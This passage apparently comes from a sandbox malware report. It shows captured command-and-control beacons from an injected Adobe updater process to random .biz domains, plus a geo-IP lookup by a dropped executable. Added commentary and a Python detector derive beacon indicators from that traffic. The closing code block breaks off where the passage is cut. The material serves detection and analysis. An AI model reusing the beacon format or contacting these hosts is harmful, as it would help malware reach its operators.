    Set-Cookie: btst=68892579e3514c72578ad62da9fb7571|8.46.123.189|1736942336|1736942336|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID | Process
42         | 192.168.2.22 | 49210       | 82.112.184.197 | 80               |     |

Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:55.975646019 CET | 353               | OUT       | POST /qpqnetyp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 784
Jan 15, 2025 12:58:55.975646019 CET | 784               | OUT       | Data Raw: 87 9a 3a be 35 37 ae c6 04 03 00 00 7c c0 70 d6 7f a4 37 9d f9 ab 14 7e cc 85 1f 6a f6 0c ba 30 a3 8d 66 2d 34 cf 11 52 df d8 69 a4 99 99 15 f3 13 c8 fb 00 f0 fa 0a fd 97 2e 12 e8 24 c6 2f 68 bb 15 df 4f 24 23 e5 a0 ed 2d a4 e5 c6 50 36 21 16 10
    Data Ascii: :57|p7~j0f-4Ri.$/hO$#-P6!)?Ken>9cJ0 ^n<Yv'nQEmJ]RoE7jR/PJ&WG~^c$hXh--c%N">od33J'#e


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
43         | 192.168.2.22 | 49211       | 44.221.84.105  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:56.838746071 CET | 361               | OUT       | POST /tgbpchottuabpqdq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: bumxkqgxu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:56.838781118 CET | 850               | OUT       | Data Raw: ef 31 8c 07 1d b9 00 c9 46 03 00 00 89 8d 51 01 ac b4 72 73 76 48 ff 00 43 4d f6 14 82 81 ac 10 4f cb e5 2d 8f 08 ef 7f 60 95 da e9 5b b5 b7 f7 cd 44 db e7 05 f7 5d bc cc fd be 7c f7 37 18 23 fc 21 00 a4 c0 0e 68 8f f9 2b 0c 84 bd c8 db c7 f1 09
    Data Ascii: 1FQrsvHCMO-`[D]|7#!h+n7N!C>2Lg'/WFZu`E>Pf3*tjA\D`g'`r2,RSQmN%pSZagaK[e$Z_'N"A`"u9g/ThZU
Jan 15, 2025 12:58:57.376599073 CET | 413               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:57 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b280894b37c829555135b2f23b25af96|8.46.123.189|1736942337|1736942337|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
44         | 192.168.2.22 | 49212       | 54.244.188.177 | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:57.598474026 CET | 359               | OUT       | POST /bcafsfattyjokwi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dwrqljrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:57.598474026 CET | 850               | OUT       | Data Raw: ae 77 ef fb ac 8f b8 b3 46 03 00 00 8c e8 3e a7 99 c0 e0 cf 14 39 57 e4 ba 74 4c fa 24 b5 d2 70 41 9c 78 69 39 87 12 42 53 77 5c ae cd 74 2c 97 95 d0 52 29 ef 0c 6f 61 82 23 4c 36 c8 52 77 69 af 72 1b b6 ce 87 c2 a8 01 1f 72 84 06 21 04 ab 5d 9c
    Data Ascii: wF>9WtL$pAxi9BSw\t,R)oa#L6Rwirr!]<UM^a!k[:?p0PDUt\e /N'.x"h(wak:U:H;.1_6yg u99wi
Jan 15, 2025 12:58:58.308698893 CET | 412               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:58 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=feff8ff68bd52a708a6ab6fadbfa3d13|8.46.123.189|1736942338|1736942338|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
45         | 192.168.2.22 | 49213       | 35.164.78.200  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:58.330640078 CET | 351               | OUT       | POST /uihfupcxt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: nqwjmb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:58.330674887 CET | 850               | OUT       | Data Raw: 08 2d 15 04 33 e4 8b 16 46 03 00 00 1c 2e b9 9e 82 ca da cd 34 59 11 cf ea 19 11 d2 80 13 a6 30 90 f0 bc 26 32 20 66 7c 71 ab 3b ff 71 5b c1 4e d1 0f f7 73 01 9d cb d3 ea 64 fe 4f 77 7e 41 c9 e1 03 03 40 de 35 6b 22 f4 ae ec 31 a6 70 b9 f4 8a d4
    Data Ascii: -3F.4Y0&2 f|q;q[NsdOw~A@5k"1poXI9^aTpwEnU_z?M_}Tute!oK@;=}B`Q-I>ui+u3KZ`AWJ^PIr8hw*l8
Jan 15, 2025 12:58:59.220516920 CET | 410               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:58 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=3d22ead3f581be6b4a2348d1875dc56b|8.46.123.189|1736942338|1736942338|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.22 | 49214 | 3.94.10.34 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:59.258728027 CET | 353 | OUT | POST /qgbipxbu HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: ytctnunms.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 850
Jan 15, 2025 12:58:59.258728027 CET | 850 | OUT | Data Raw: c7 3f 3b 8c 7e ea 12 c2 46 03 00 00 e6 7d b4 41 3f 2d 95 d0 ae b6 d7 85 ff 55 0d 10 94 1d d7 9b b0 c2 19 3e f6 d6 3b 5c 4c 00 25 a0 40 cf 28 a0 78 4a 2a 39 70 1c 1f 40 2f 90 04 3b a3 4c 42 1f 61 09 a2 4f 8a e8 2a 11 56 7a 87 e2 c4 bd 54 61 c0 00
  Data Ascii: ?;~F}A?-U>;\L%@(xJ*9p@/;LBaO*VzTa(}spDm]3GQk0PiU6]+m\+bU>a~Tw?9{8^rlci.Depg=V"`rSGBUD}Tu$
Jan 15, 2025 12:58:59.714334965 CET | 413 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 15 Jan 2025 11:58:59 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=dfc4728a8871826f009980221834205c|8.46.123.189|1736942339|1736942339|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.22 | 49215 | 165.160.13.20 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:59.741719961 CET | 342 | OUT | POST /d HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: myups.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 850
Jan 15, 2025 12:58:59.741744995 CET | 850 | OUT | Data Raw: f0 78 e6 41 31 8c 64 d0 46 03 00 00 d1 45 7c b9 ff 53 b3 28 87 2f dc d1 9d cd 82 1b 33 d0 01 4e f9 c6 68 5b f6 38 1f 06 eb f7 6e b2 12 85 15 f7 42 1a 19 46 87 08 45 c8 1c 50 5d 1c 13 2b 38 88 3c 2d d2 d4 bc ef 18 8a 49 fe f9 ea e3 7b 34 f0 cf 9d
  Data Ascii: xA1dFE|S(/3Nh[8nBFEP]+8<-I{42 mqLuPv;*ZXYApW:_</<=%?h`Nf/w9F;#X"6pU`*4F_bqJgfFha
Jan 15, 2025 12:59:00.419083118 CET | 170 | IN | HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 11:59:00 GMT
  Content-Length: 94
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Jan 15, 2025 12:59:00.514822006 CET | 346 | OUT | POST /cufth HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: myups.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 850
Jan 15, 2025 12:59:00.514852047 CET | 850 | OUT | Data Raw: e4 85 cb 29 69 ce a4 c6 46 03 00 00 10 84 9c 40 ff d0 a5 1d ee 09 e4 ea ac 61 2e 8b 21 84 01 a9 6d 1b a2 f7 fa 81 c2 70 54 9d e0 e3 6b 30 a8 b0 c8 97 1f 2f 20 1d b3 e9 94 54 a9 97 cd 79 fd 9d b0 10 22 f1 02 d0 e0 ae a9 f8 1b 02 6d 05 6f ad c1 4a
  Data Ascii: )iF@a.!mpTk0/ Ty"moJQ4l>o:x&:mvOr<n)ok%[;i5>i^X]*Z'4QBl>2DiRb|Ed=myM$V@IoN
Jan 15, 2025 12:59:00.725339890 CET | 170 | IN | HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 11:59:00 GMT
  Content-Length: 94
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Jan 15, 2025 12:59:00.948759079 CET | 170 | IN | HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 11:59:00 GMT
  Content-Length: 94
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.22 | 49216 | 54.244.188.177 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:59:00.775101900 CET | 351 | OUT | POST /nqxton HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: oshhkdluh.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 850
Jan 15, 2025 12:59:00.775135994 CET | 850 | OUT | Data Raw: 45 cc 01 73 9b 95 83 96 46 03 00 00 63 95 21 76 fb 9d f8 a4 90 bd f5 a3 35 ee 75 29 17 f4 62 8e e5 70 71 e6 66 a6 6c 50 a8 d2 b0 2d f5 4c c1 ec 5b d6 f6 aa e9 b2 29 0d 32 2d 01 27 c7 8e f8 18 42 d0 c0 9f f7 4b 60 33 e1 ad 20 85 4c a2 a5 86 a6 d8
  Data Ascii: EsFc!v5u)bpqflP-L[)2-'BK`3 Lcg9le u9Did"lx5" a+M<{0G}_^4``@%im'h5TOou@s.)vwFL&RN'2qerqO8Yx
Jan 15, 2025 12:59:01.508352995 CET | 413 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 15 Jan 2025 11:59:01 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=3469880699a094ed6bd826c9788559e5|8.46.123.189|1736942341|1736942341|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
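
The sessions above repeat one shape: armsvc.exe (PID 3728, the Adobe ARM updater service path, which the report elsewhere flags as having been injected into) POSTs an 850-byte opaque body over plain HTTP to a short .biz hostname with a short lowercase path, always with the same WeChat/QQBrowser User-Agent, and every body dump shown starts with 8 bytes followed by 46 03 00 00 at offset 8 (0x346 = 838 = 850 - 12). Replies are either a chunked nginx response that only sets btst/snkz cookies and sends the empty terminating chunk, or a 94-byte HTML stub whose only content is a "revised" meta tag. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code: it re-derives those indicators from constructed copies of the session 46 request and response. Reading the four bytes at offset 8 as a little-endian length of the remainder is an assumption that fits all six bodies shown; everything past the first 12 body bytes is constructed padding because the report truncates the dump; the indicator tag names and the three-hit threshold in is_beacon are the example's own choices.

```python
from __future__ import annotations
import re
import struct
from dataclasses import dataclass

# User-Agent sent verbatim in every POST of sessions 45-49 above.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)

@dataclass
class Session:
    """One row of the report's session table."""
    sid: int
    pid: int
    process: str
    dst_ip: str
    dst_port: int

def parse_request(raw: str) -> dict:
    """Split a request header block into method, path and a lower-cased header map."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}

def body_length_field_ok(body: bytes) -> bool:
    """Assumed framing: 8 opaque bytes, then a little-endian u32 giving the length of
    the rest. All six captured bodies carry 0x346 (838) there and 12 + 838 == 850."""
    return len(body) >= 12 and struct.unpack_from("<I", body, 8)[0] == len(body) - 12

def beacon_indicators(sess: Session, raw_request: str, body: bytes) -> list[str]:
    """Return the indicator tags (names are the example's own) matched by one POST."""
    req = parse_request(raw_request)
    hdr = req["headers"]
    hits = []
    if hdr.get("user-agent") == BEACON_UA:
        hits.append("ua:wechat-qqbrowser")
    if req["method"] == "POST" and hdr.get("content-length") == "850":
        hits.append("post:content-length-850")
    if body_length_field_ok(body):
        hits.append("body:length-field-at-8")
    if re.fullmatch(r"[a-z]{4,10}\.biz", hdr.get("host", "")):
        hits.append("host:short-random-biz")
    if re.fullmatch(r"/[a-z]{1,12}", req["path"]):
        hits.append("path:random-lowercase")
    # Adobe's ARM updater service has no reason to POST opaque blobs over plain HTTP.
    if sess.process.lower().endswith("\\armsvc.exe") and sess.dst_port == 80:
        hits.append("proc:armsvc-http-post")
    return hits

def is_beacon(sess: Session, raw_request: str, body: bytes, min_hits: int = 3) -> bool:
    """Example threshold: three independent indicators are enough to alert."""
    return len(beacon_indicators(sess, raw_request, body)) >= min_hits

def response_fingerprint(raw_response: str) -> str | None:
    """Classify the two reply shapes seen above: the chunked nginx reply that sets
    btst/snkz cookies and sends only the empty terminating chunk, or the 94-byte
    HTML stub whose only payload is a 'revised' meta tag."""
    head, _, body = raw_response.partition("\r\n\r\n")
    cookies = []
    for line in head.splitlines()[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            cookies.append(value.strip().split("=", 1)[0])
    if "btst" in cookies and "snkz" in cookies and body.strip() == "0":
        return "nginx-btst-snkz-empty-chunk"
    if 'name="revised" content="1.1.7"' in body:
        return "html-stub-revised-1.1.7"
    return None

# Constructed inputs copied from session 46 above; body padded as noted in the lead-in.
SESSION_46 = Session(46, 3728, r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe",
                     "3.94.10.34", 80)
REQUEST_46 = (
    "POST /qgbipxbu HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    f"Pragma: no-cache\r\nHost: ytctnunms.biz\r\nUser-Agent: {BEACON_UA}\r\nContent-Length: 850\r\n"
)
# First 12 bytes are from the capture; the remaining 838 are constructed padding.
BODY_46 = bytes.fromhex("c7 3f 3b 8c 7e ea 12 c2 46 03 00 00") + b"\x00" * 838
RESPONSE_46 = (
    "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 15 Jan 2025 11:58:59 GMT\r\n"
    "Content-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\n"
    "Set-Cookie: btst=dfc4728a8871826f009980221834205c|8.46.123.189|1736942339|1736942339|0|1|0; "
    "path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;\r\n"
    "Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT\r\n\r\n0\r\n\r\n"
)
# The 94-byte stub returned by myups.biz in session 47.
RESPONSE_STUB = (
    "HTTP/1.1 200 OK\r\nDate: Wed, 15 Jan 2025 11:59:00 GMT\r\nContent-Length: 94\r\n\r\n"
    '<html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>\n'
)

if __name__ == "__main__":
    print(beacon_indicators(SESSION_46, REQUEST_46, BODY_46), is_beacon(SESSION_46, REQUEST_46, BODY_46))
    print(response_fingerprint(RESPONSE_46), response_fingerprint(RESPONSE_STUB))
```

The first five indicators are pure wire observations and are what a network rule (the report's Suricata alerts, for instance) can key on; the sixth needs the process-to-connection pairing that the sandbox supplies as PID and process path and that, on a production host, would come from endpoint telemetry such as Sysmon network-connection events. The body framing check is the one most worth re-validating against a full capture, since the report only shows the first hundred or so bytes of each 850-byte body.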


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.22 | 49217 | 18.246.231.120 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:59:02.063853979 CET | 351 | OUT | POST /njuvyxgvhb HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: jpskm.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 850
Jan 15, 2025 12:59:02.063890934 CET | 850 | OUT | Data Raw: 99 d4 dc 05 7b 3b c5 36 46 03 00 00 86 65 3b 49 29 3e 11 0b 42 0b 9d 1e 59 ac 43 13 a4 cb f4 f6 ff c9 eb 1a 97 3c f6 db e1 21 cd 98 a0 a6 65 87 1e a6 07 3c c2 23 d2 6e c3 4a 2d 48 a1 b3 f3 74 85 cd 03 a1 6f 6e 79 6f b4 82 67 f9 26 92 f3 9a 01 65
  Data Ascii: {;6Fe;I)>BYC<!e<#nJ-Htonyog&e=3OJ!|?Y y0Sgqwvo}[^!%:C$9$S!,WA{FUsZ?MBts,=OYHS5EawZ@RyvX@2!sK";Yg]>!u
Jan 15, 2025 12:59:02.782277107 CET | 409 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 15 Jan 2025 11:59:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=15c177ec30e41e5a6aed326d471a059c|8.46.123.189|1736942342|1736942342|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.22 | 49218 | 54.244.188.177 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:59:02.804809093 CET | 352 | OUT | POST /rmrhacpx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lrxdmhrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:59:02.804934978 CET | 850 | OUT | Data Raw: 27 51 85 03 ab fc 1e a5 46 03 00 00 26 72 c9 9a e4 e1 da f1 01 81 52 22 72 94 65 e5 08 10 63 1c ba e2 15 fb 00 f9 d9 6b bb cf 35 7d fe d0 60 04 df 77 ea 03 2f fc 9c 1b 8f 7d 36 00 27 88 15 37 11 19 dd 14 98 7f 1a 70 56 b2 43 12 b9 5b cd a7 4a 06
    Data Ascii: 'QF&rR"reck5}`w/}6'7pVC[Jm&I{fX.>x<iF[An_:LD'TK0Mpb,.$_AG+%.)B|Ai*lOVe30 G7LKeNu4$_v\x}c+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49168 | 104.21.80.1 | 443 | 3800 | C:\Users\user\AppData\Local\Temp\Microsofts.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 11:57:11 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-15 11:57:12 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Wed, 15 Jan 2025 11:57:12 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2257021
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Awnvj%2Fiz%2FOeo4cR5b9wL1zmSQgAmNwIImSO4fhnuu0K2bHpJwvPfQ0V9ATY2Vwjq1w3vlQRqkxw%2FqsGI%2BbIIXMFvczZQzGCB5EWTjjQSealWw%2ByxnOJ8%2BiSrEqp2qckLNUap6uVu"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9025afd6299d7d14-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2097&min_rtt=1956&rtt_var=1016&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=945289&cwnd=237&unsent_bytes=0&cid=d1fa8a1dc2ee04f7&ts=530&x=0"
2025-01-15 11:57:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
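The three exchanges above are the page's network story in miniature: two POST beacons, to jpskm.biz and to lrxdmhrr.biz (the latter from the trojanised armsvc.exe), with an identical header set, the same stale WeChat-style User-Agent and the same 850-byte body length, answered by an empty chunked reply (Data Raw 30 0d 0a 0d 0a is the zero-length terminating chunk); and a GET from Microsofts.exe to reallyfreegeoip.org for the sandbox's own egress address. In both captured bodies the bytes at offset 8 are 46 03 00 00, little-endian 838, which is exactly 850 minus 12. As an added example that is not part of the Joe Sandbox report, the Python below re-parses those requests and scores each one against these traits. Reading offset 8 as a 4-byte length behind an 8-byte prefix is an assumption the code labels as such; the indicator names, the GEOIP_HOSTS set and the function names are the example's own.

```python
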